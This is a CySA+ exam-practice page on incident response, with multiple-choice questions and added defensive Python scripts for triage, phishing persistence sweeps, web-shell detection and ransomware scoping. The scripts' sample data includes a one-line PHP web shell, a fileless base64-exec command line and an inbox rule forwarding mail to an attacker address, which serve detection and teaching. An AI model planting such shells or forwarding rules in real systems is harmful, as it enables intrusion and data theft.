Courseiva is a free IT certification practice platform offering original exam-style practice questions, detailed explanations, topic-based practice, mock exams, readiness tracking, and study analytics for Cisco, CompTIA, Microsoft, AWS, and other technology certifications.

© 2026 Courseiva. Courseiva is operated by JTNetSolutions Ltd. All rights reserved.

Courseiva is an independent certification practice platform and is not affiliated with, endorsed by, or sponsored by Cisco, Microsoft, AWS, CompTIA, Google, ISC2, ISACA, or any other certification vendor. Vendor names and certification marks are used only to identify the exams learners are preparing for.

CompTIA · CS0-003

CS0-003 Incident Response and Management Practice Questions

20+ practice questions focused on Incident Response and Management — one of the most tested topics on the CompTIA CySA+ CS0-003 exam. Each question includes a detailed explanation so you learn why the right answer is correct.

Exam Domains

Security Operations · Vulnerability Management · Incident Response and Management · Reporting and Communication

Sample Incident Response and Management Questions

1.

A host is suspected of running fileless malware. Which artifacts should be collected quickly? (Choose two.)

A. Memory image or live response data
B. Active network connections and running processes
C. A list of cafeteria purchases
D. A printed office map

Explanation: Options A and B are correct. Fileless malware runs in memory without writing a payload to disk, so a memory image or live response data is the only place its code, injected DLLs, and process-hollowing artifacts can be found. All of that is lost on reboot, and much of it as soon as the process is killed, so collect first and contain second. Active network connections and running processes tie the in-memory code to its C2 traffic and to the parent that spawned it, which is what scopes the infection and points to the entry vector. Cafeteria purchases and office maps have no evidentiary value.
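The triage that options A and B describe, as an added example that is not part of the Courseiva question set: it joins a process listing to a socket listing and ranks processes that hold an established connection outside the network or carry an in-memory execution pattern on their command line. The `ss`/`ps` output, the internal address ranges and the indicator patterns are constructed assumptions for the example; on a live host you would feed it the real command output, captured to removable media before any reboot.

```python
"""Live-response triage for a suspected fileless host: join the process list to
the socket list, then rank processes that talk outside the network or carry an
in-memory execution pattern on their command line."""
import re
from ipaddress import ip_address, ip_network

# Assumed internal ranges for this fictional environment (tune to your own).
INTERNAL_NETS = [ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

# Command-line fragments typical of code that never touches disk (assumed list).
INMEMORY_PATTERNS = re.compile(r"exec\(|base64|-enc\b|\biex\b|/dev/shm|memfd", re.IGNORECASE)

# One line of `ss -tunap` (header trimmed) and one line of `ps -eo pid,ppid,user,args --no-headers`.
SS_RE = re.compile(r'^(?P<proto>\S+)\s+(?P<state>\S+)\s+\d+\s+\d+\s+(?P<local>\S+)\s+(?P<peer>\S+)\s+'
                   r'users:\(\("(?P<name>[^"]+)",pid=(?P<pid>\d+),fd=\d+\)\)')
PS_RE = re.compile(r"^\s*(?P<pid>\d+)\s+(?P<ppid>\d+)\s+(?P<user>\S+)\s+(?P<args>.*)$")

# Constructed sample output (not captured from a real host).
SS_OUTPUT = """\
tcp ESTAB  0 0   10.0.0.5:49812 203.0.113.7:443 users:(("python3",pid=4411,fd=3))
tcp ESTAB  0 0   10.0.0.5:22    10.0.0.9:51400  users:(("sshd",pid=812,fd=4))
tcp LISTEN 0 128 0.0.0.0:80     0.0.0.0:*       users:(("nginx",pid=1200,fd=6))
udp UNCONN 0 0   0.0.0.0:68     0.0.0.0:*       users:(("dhclient",pid=640,fd=5))
"""
PS_OUTPUT = """\
    1     0 root     /sbin/init
  640     1 root     /sbin/dhclient -4 eth0
  812     1 root     /usr/sbin/sshd -D
 1200     1 root     nginx: master process /usr/sbin/nginx
 4390  1200 www-data nginx: worker process
 4411  4390 www-data python3 -c import base64,os;exec(base64.b64decode(os.environ["P"]))
"""


def parse_ps(text):
    """pid -> {ppid, user, args}"""
    procs = {}
    for line in text.splitlines():
        m = PS_RE.match(line)
        if m:
            procs[int(m["pid"])] = {"ppid": int(m["ppid"]), "user": m["user"], "args": m["args"]}
    return procs


def parse_ss(text):
    """Sockets with the owning pid and the peer IP split from its port."""
    conns = []
    for line in text.splitlines():
        m = SS_RE.match(line)
        if m:
            peer_ip = m["peer"].rsplit(":", 1)[0].strip("[]")
            conns.append({"pid": int(m["pid"]), "state": m["state"],
                          "peer": m["peer"], "peer_ip": peer_ip})
    return conns


def is_internal(ip_text):
    try:
        ip = ip_address(ip_text)
    except ValueError:          # '*' on listening/unconnected sockets
        return True
    return any(ip in net for net in INTERNAL_NETS)


def ancestry(procs, pid):
    """Executable names from the process up to init: a web worker spawning an interpreter stands out."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        chain.append(procs[pid]["args"].split()[0].rstrip(":"))
        pid = procs[pid]["ppid"]
    return chain


def triage(ps_text, ss_text):
    """Suspicious processes, most reasons first."""
    procs, conns = parse_ps(ps_text), parse_ss(ss_text)
    reasons, peers = {}, {}
    for c in conns:
        if c["state"] == "ESTAB" and not is_internal(c["peer_ip"]):
            reasons.setdefault(c["pid"], set()).add("external_connection")
            peers.setdefault(c["pid"], []).append(c["peer"])
    for pid, p in procs.items():
        if INMEMORY_PATTERNS.search(p["args"]):
            reasons.setdefault(pid, set()).add("inmemory_cmdline")
    findings = []
    for pid, why in reasons.items():
        p = procs.get(pid, {"user": "?", "args": "?"})
        findings.append({"pid": pid, "user": p["user"], "args": p["args"],
                         "reasons": sorted(why), "peers": peers.get(pid, []),
                         "ancestry": ancestry(procs, pid)})
    findings.sort(key=lambda f: -len(f["reasons"]))
    return findings


if __name__ == "__main__":
    for f in triage(PS_OUTPUT, SS_OUTPUT):
        print(f["pid"], f["user"], f["reasons"], " <- ".join(f["ancestry"]), f["peers"])
```

In the constructed sample the only hit is pid 4411: an interpreter started by an nginx worker, executing a decoded blob from its environment, with a session to an address outside the assumed internal ranges. The inbound SSH session is ignored because its peer is internal. The pid in the finding is what you then hand to a memory acquisition tool before touching anything else.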

2.

A phishing incident led to credential theft. Which containment actions are appropriate? (Choose two.)

A. Reset affected credentials and revoke active sessions
B. Delete all user mailboxes
C. Disable DNS for the entire company indefinitely
D. Search for mailbox rules or OAuth grants created after compromise

Explanation: Options A and D are correct. A password reset alone is not enough: refresh tokens and session cookies the attacker already holds stay valid until they are revoked, so do both (for example Set-ADAccountPassword -Reset on-premises, and Revoke-MgUserSignInSession in Microsoft Graph PowerShell, which replaces the older AzureAD module's Revoke-AzureADUserAllRefreshToken). Option D matters because attackers routinely plant persistence that survives a reset: inbox rules that forward mail externally, delete it, or hide password-reset notices and security alerts in an obscure folder, and OAuth application consents that grant a token independent of the user's password. Find and remove anything created after the compromise window. Deleting mailboxes destroys evidence, and disabling DNS company-wide is disproportionate. This aligns with the NIST SP 800-61 containment phase, which prioritizes cutting off attacker access while preserving forensic evidence.
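A sweep for the persistence option D describes, added here as an example and not part of the original question set. It runs over a constructed audit export in a simplified shape (the field names are an assumption of this example, not the Microsoft 365 Unified Audit Log schema); the internal domain, the hiding folders and the risky-scope list are also assumptions to adapt to your tenant.

```python
"""Post-phishing persistence sweep: inbox rules, mailbox forwarding and OAuth
consents created by the compromised user after the compromise time."""
from datetime import datetime, timezone

# Assumed internal mail domains and the folders attackers use to hide mail.
INTERNAL_DOMAINS = {"corp.example"}
HIDING_FOLDERS = {"rss feeds", "rss subscriptions", "conversation history", "junk email",
                  "deleted items", "archive"}
# Delegated scopes that keep giving mailbox/file access after a password reset (assumed list).
RISKY_SCOPES = {"Mail.Read", "Mail.ReadWrite", "Mail.Send", "MailboxSettings.ReadWrite",
                "Files.ReadWrite.All", "offline_access"}
FORWARD_PARAMS = ("ForwardTo", "ForwardAsAttachmentTo", "RedirectTo",
                  "ForwardingSmtpAddress", "ForwardingAddress")

# Constructed audit records in a simplified shape (an assumption of this example,
# not the exact Unified Audit Log schema).
AUDIT = [
    {"time": "2024-05-02T09:12:00Z", "user": "alice@corp.example", "op": "New-InboxRule",
     "params": {"Name": ".", "ForwardTo": "drop@attacker.example", "DeleteMessage": True}},
    {"time": "2024-05-02T09:15:00Z", "user": "alice@corp.example", "op": "New-InboxRule",
     "params": {"Name": "invoices", "SubjectContainsWords": "password;security alert",
                "MoveToFolder": "RSS Feeds", "MarkAsRead": True}},
    {"time": "2024-04-20T08:00:00Z", "user": "alice@corp.example", "op": "New-InboxRule",
     "params": {"Name": "team", "FromAddressContainsWords": "team@corp.example",
                "MoveToFolder": "Team"}},
    {"time": "2024-05-02T09:20:00Z", "user": "alice@corp.example", "op": "Consent to application",
     "params": {"AppDisplayName": "Mail Sync Helper",
                "Scopes": "Mail.Read Mail.ReadWrite offline_access"}},
    {"time": "2024-05-02T10:00:00Z", "user": "bob@corp.example", "op": "New-InboxRule",
     "params": {"Name": "newsletters", "MoveToFolder": "News"}},
]


def parse_time(text):
    return datetime.fromisoformat(text.replace("Z", "+00:00")).astimezone(timezone.utc)


def is_external(address):
    domain = address.rsplit("@", 1)[-1].lower()
    return domain not in INTERNAL_DOMAINS


def rule_reasons(params):
    """Why an inbox rule or mailbox forwarding setting looks attacker-made."""
    reasons = []
    for key in FORWARD_PARAMS:
        target = params.get(key)
        if target and is_external(str(target)):
            reasons.append(f"forwards_externally:{key}")
    if params.get("DeleteMessage"):
        reasons.append("deletes_mail")
    if str(params.get("MoveToFolder", "")).lower() in HIDING_FOLDERS:
        reasons.append("hides_mail_in_folder")
    words = str(params.get("SubjectContainsWords", "")).lower()
    if any(w in words for w in ("password", "security", "alert", "verify")):
        reasons.append("targets_security_notices")
    return reasons


def consent_reasons(params):
    granted = set(str(params.get("Scopes", "")).split())
    risky = sorted(granted & RISKY_SCOPES)
    return [f"risky_scopes:{' '.join(risky)}"] if risky else []


def sweep(records, user, compromise_time):
    """Findings for one user from the compromise time onward, oldest first."""
    since = parse_time(compromise_time)
    findings = []
    for rec in sorted(records, key=lambda r: parse_time(r["time"])):
        if rec["user"].lower() != user.lower() or parse_time(rec["time"]) < since:
            continue
        if rec["op"] in ("New-InboxRule", "Set-InboxRule", "Set-Mailbox"):
            reasons = rule_reasons(rec["params"])
        elif rec["op"] == "Consent to application":
            reasons = consent_reasons(rec["params"])
        else:
            continue
        if reasons:
            findings.append({"time": rec["time"], "op": rec["op"],
                             "name": rec["params"].get("Name") or rec["params"].get("AppDisplayName"),
                             "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in sweep(AUDIT, "alice@corp.example", "2024-05-02T09:00:00Z"):
        print(f["time"], f["op"], f["name"], f["reasons"])
```

For the constructed user the sweep returns the external-forwarding rule, the rule that buries password and security-alert mail in RSS Feeds, and the consent grant for an app with mailbox scopes plus offline_access; the rule created two weeks earlier and the other user's rule are left alone. Each finding is a removal action (delete the rule, revoke the grant, clear mailbox forwarding), and the rule names themselves are evidence to preserve before deleting.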

3.

Which actions belong in eradication after a confirmed web-shell compromise? (Choose two.)

A. Remove the web shell and close the exploited vulnerability
B. Reconnect the server before checking persistence
C. Rotate credentials exposed to the compromised web server
D. Only block the analyst's IP address

Explanation: Options A and C are correct. Removing the web shell eliminates the attacker's foothold, and closing the exploited vulnerability (patching the application, disabling dangerous functions such as `eval()` or `system()`, or updating a CMS plugin) prevents re-exploitation through the same path. A web shell runs with the web server's identity and can read anything that identity can, including database connection strings, API keys, and service-account credentials in configuration files, so those credentials must be treated as exposed and rotated. Reconnecting before checking for persistence (cron jobs, added accounts, a second shell dropped elsewhere) invites immediate re-compromise, and blocking a single IP address removes nothing. This aligns with the eradication phase of incident response, which aims to remove all artifacts of the compromise and harden the system against the same attack vector.
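An added example (not from the page) of checking off both eradication steps on a web root: rank files for web-shell indicators, and list the credential-bearing settings a shell running as the web server could have read. The file inventory, paths and contents are constructed; the indicator list, the writable-directory list and the threshold are assumptions to tune. Patching the exploited vulnerability itself is outside what a script like this can do.

```python
"""Web-shell eradication helper: rank candidate shells in a web root and list the
secrets the web server identity could read, which must be rotated after removal."""
import re
from datetime import datetime, timezone

# Indicators of a PHP web shell: dynamic evaluation or command execution fed by request input.
SHELL_INDICATORS = {
    "eval": re.compile(r"\beval\s*\(", re.I),
    "assert": re.compile(r"\bassert\s*\(", re.I),
    "exec_func": re.compile(r"\b(system|shell_exec|passthru|exec|popen|proc_open)\s*\(", re.I),
    "decoder": re.compile(r"\b(base64_decode|gzinflate|str_rot13)\s*\(", re.I),
    "request_input": re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b"),
}
WRITABLE_DIRS = ("/uploads/", "/cache/", "/tmp/", "/temp/")   # assumed web-writable locations
# Config keys whose values are credentials the server (and so the shell) could read.
SECRET_KEY = re.compile(r"(password|passwd|secret|api[_-]?key|token|private[_-]?key)", re.I)
DEFINE_RE = re.compile(r"""define\(\s*['"](\w+)['"]\s*,""")          # PHP define('KEY', ...)
ENV_RE = re.compile(r"^\s*([A-Za-z_][A-Za-z0-9_]*)\s*=", re.M)        # KEY=value lines

# Constructed file inventory (path, last-modified time, content); none of it is real.
DEPLOYED = "2024-04-01T00:00:00Z"
FILES = [
    {"path": "/var/www/html/wp-content/uploads/2024/05/cache.php", "mtime": "2024-05-03T02:14:00Z",
     "content": "<?php @eval(base64_decode($_POST['x'])); ?>"},
    {"path": "/var/www/html/wp-content/plugins/seo/lib/Util.php", "mtime": "2024-03-10T12:00:00Z",
     "content": "<?php function decode($s){ return base64_decode($s); }"},
    {"path": "/var/www/html/index.php", "mtime": "2024-03-10T12:00:00Z",
     "content": "<?php require __DIR__ . '/wp-blog-header.php';"},
    {"path": "/var/www/html/wp-config.php", "mtime": "2024-03-10T12:00:00Z",
     "content": "<?php define('DB_NAME', 'wp'); define('DB_USER', 'wp'); define('DB_PASSWORD', 'hunter2');"},
    {"path": "/var/www/html/.env", "mtime": "2024-03-10T12:00:00Z",
     "content": "APP_ENV=production\nSMTP_PASSWORD=abc\nSTRIPE_API_KEY=sk_test_123\n"},
]


def parse_time(text):
    return datetime.fromisoformat(text.replace("Z", "+00:00")).astimezone(timezone.utc)


def shell_score(entry, deployed):
    """Indicator hits plus context: changed after deployment, or sitting in a web-writable directory."""
    hits = [name for name, rx in SHELL_INDICATORS.items() if rx.search(entry["content"])]
    if parse_time(entry["mtime"]) > parse_time(deployed):
        hits.append("modified_after_deploy")
    if any(d in entry["path"] for d in WRITABLE_DIRS):
        hits.append("web_writable_dir")
    return len(hits), hits


def find_webshells(files, deployed, threshold=3):
    """Files at or above the threshold, highest score first; a lone base64_decode in a plugin stays below it."""
    ranked = []
    for entry in files:
        score, hits = shell_score(entry, deployed)
        if score >= threshold:
            ranked.append({"path": entry["path"], "score": score, "hits": hits})
    return sorted(ranked, key=lambda r: -r["score"])


def secrets_to_rotate(files):
    """(path, key) for every credential-looking setting in config files."""
    found = []
    for entry in files:
        keys = DEFINE_RE.findall(entry["content"]) + ENV_RE.findall(entry["content"])
        found.extend((entry["path"], k) for k in keys if SECRET_KEY.search(k))
    return found


def eradication_plan(files, deployed):
    return {"remove": [s["path"] for s in find_webshells(files, deployed)],
            "rotate": secrets_to_rotate(files)}


if __name__ == "__main__":
    plan = eradication_plan(FILES, DEPLOYED)
    print("remove:", plan["remove"])
    print("rotate:", plan["rotate"])
```

On the constructed inventory the upload-directory file that evals decoded POST data, modified after the last deployment, is the only candidate; the plugin that merely calls base64_decode scores one and is ignored. The rotate list (database password, SMTP password, payment API key) is what the shell could have read, regardless of whether there is proof it did.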

4.

What should be included in incident scoping for ransomware? (Choose three.)

A. Initial infected host and user context
B. The brand of office chairs near the server room
C. Backup integrity and last known clean restore point
D. Shares or systems touched by the compromised account

Explanation: Options A, C and D are correct. Identifying the initial infected host and user context is critical for understanding the attack vector, containing the threat, and preventing further spread: in ransomware incidents the first compromised system usually reveals the entry point (a phishing email, RDP brute force) and the account used, and its timestamp anchors everything else in scope. Backup integrity and the last known clean restore point belong in scope because ransomware operators routinely reach backups before they encrypt, and "clean" must mean before the first sign of compromise, not merely before encryption started. Enumerating the shares and systems the compromised account touched defines the blast radius and the list of systems that need containment and restoration. Office furniture is irrelevant.
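Scoping the blast radius from options A, C and D with log data, added here as an example and not from the page: it takes the first infected host's time and account and lists every host and share the account touched afterwards, flagging backup servers among them. Event IDs 4624 (logon) and 5140 (network share accessed) are the real Windows Security events; the flattened record shape, host names and addresses are constructed assumptions.

```python
"""Ransomware scoping: from logon (4624) and share-access (5140) events, list every
host and share the compromised account touched after the initial infection."""
from datetime import datetime, timezone

LOGON_TYPES = {2: "Interactive", 3: "Network", 4: "Batch", 5: "Service",
               7: "Unlock", 8: "NetworkCleartext", 9: "NewCredentials",
               10: "RemoteInteractive", 11: "CachedInteractive"}

# Constructed Windows Security events in a simplified shape (field names are an
# assumption of this example; the event IDs 4624 and 5140 are the real ones).
EVENTS = [
    {"time": "2024-05-02T08:55:00Z", "id": 5140, "computer": "FS-01", "user": "jdoe",
     "share": r"\\*\Public", "src_ip": "10.0.5.42"},
    {"time": "2024-05-02T09:01:00Z", "id": 4624, "computer": "WS-042", "user": "jdoe",
     "logon_type": 2, "src_ip": "-"},
    {"time": "2024-05-02T09:30:00Z", "id": 4624, "computer": "FS-01", "user": "jdoe",
     "logon_type": 3, "src_ip": "10.0.5.42"},
    {"time": "2024-05-02T09:31:00Z", "id": 5140, "computer": "FS-01", "user": "jdoe",
     "share": r"\\*\Finance", "src_ip": "10.0.5.42"},
    {"time": "2024-05-02T09:40:00Z", "id": 5140, "computer": "FS-01", "user": "jdoe",
     "share": r"\\*\HR", "src_ip": "10.0.5.42"},
    {"time": "2024-05-02T10:05:00Z", "id": 4624, "computer": "SRV-BACKUP", "user": "jdoe",
     "logon_type": 10, "src_ip": "10.0.5.42"},
    {"time": "2024-05-02T10:10:00Z", "id": 4624, "computer": "FS-01", "user": "svc_backup",
     "logon_type": 3, "src_ip": "10.0.9.9"},
]


def parse_time(text):
    return datetime.fromisoformat(text.replace("Z", "+00:00")).astimezone(timezone.utc)


def scope(events, account, first_seen, backup_hosts=()):
    """Blast radius of one account from the time of the first infected host onward."""
    since = parse_time(first_seen)
    hosts, shares, timeline = set(), set(), []
    for ev in sorted(events, key=lambda e: parse_time(e["time"])):
        if ev["id"] not in (4624, 5140):
            continue
        if ev["user"].lower() != account.lower() or parse_time(ev["time"]) < since:
            continue
        hosts.add(ev["computer"])
        if ev["id"] == 4624:
            kind = LOGON_TYPES.get(ev["logon_type"], str(ev["logon_type"]))
            timeline.append((ev["time"], ev["computer"], f"logon:{kind}", ev["src_ip"]))
        else:
            shares.add(ev["share"])
            timeline.append((ev["time"], ev["computer"], f"share:{ev['share']}", ev["src_ip"]))
    return {
        "hosts": sorted(hosts),
        "shares": sorted(shares),
        "timeline": timeline,
        # Where the lateral movement came from: usually the initial host's address.
        "sources": sorted({t[3] for t in timeline if t[3] != "-"}),
        # Any backup server the account reached cannot be trusted as a clean restore source.
        "backups_touched": sorted(hosts & set(backup_hosts)),
    }


if __name__ == "__main__":
    result = scope(EVENTS, "jdoe", "2024-05-02T09:01:00Z", backup_hosts=("SRV-BACKUP",))
    for row in result["timeline"]:
        print(*row)
    print("hosts:", result["hosts"], "shares:", result["shares"],
          "backups touched:", result["backups_touched"])
```

With the constructed events the scope is three hosts, two shares and one source address; the share access before the initial logon and the other account's logon are excluded. The RemoteInteractive logon to the backup server is the finding that feeds option C: the last known clean restore point must predate that logon, not just the encryption.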

5.

A legal hold is issued during an investigation. Which actions support it? (Choose two.)

A. Preserve relevant logs, mailboxes, images, and tickets
B. Let each team decide informally what to delete
C. Purge audit logs to save storage
D. Suspend routine deletion for in-scope evidence

Explanation: Options A and D are correct. A legal hold (litigation hold) requires preservation of all potentially relevant electronically stored information (ESI). Preserving logs, mailboxes, images, and tickets ensures that data is not altered or deleted, maintaining its integrity for forensic analysis and legal proceedings. Suspending routine deletion for in-scope evidence is the other half: log rotation, retention purges, and mailbox auto-archiving continue to run unless someone stops them, and a hold that does not stop them fails silently. Letting teams delete informally or purging audit logs is spoliation and undermines discovery obligations.

How to master Incident Response and Management for CS0-003

1. Baseline your knowledge

Start with 10 questions to gauge your current understanding of Incident Response and Management. This tells you whether you need a concept refresher or just practice.

2. Review every explanation

For each question — right or wrong — read the full explanation. Understanding why an answer is correct is more valuable than knowing the answer itself.

3. Focus on exam traps

Incident Response and Management questions on the CS0-003 frequently use trap wording. Look for subtle differences in answers that test your precision, not just general knowledge.

4. Reach 80% consistently

Do repeated sessions until you score 80%+ three times in a row. Then move to mixed-mode practice to test cross-topic recall under realistic conditions.

Frequently asked questions

How many CS0-003 Incident Response and Management questions are on the real exam?

The exact number varies per candidate. Incident Response and Management is tested as part of the CompTIA CySA+ CS0-003 blueprint. Practicing with targeted Incident Response and Management questions ensures you can handle any format or difficulty that appears.

Are these CS0-003 Incident Response and Management practice questions free?

Yes. Courseiva provides free CS0-003 practice questions across all exam topics and domains. The platform includes topic-based practice, mock exams, missed-question review, bookmarked questions, and readiness tracking — no account required.

Is Incident Response and Management one of the harder CS0-003 topics?

Difficulty is subjective, but Incident Response and Management is a high-priority exam concept tested in multiple ways — direct recall, scenario analysis, and command-output interpretation. Consistent practice is the best way to build confidence.
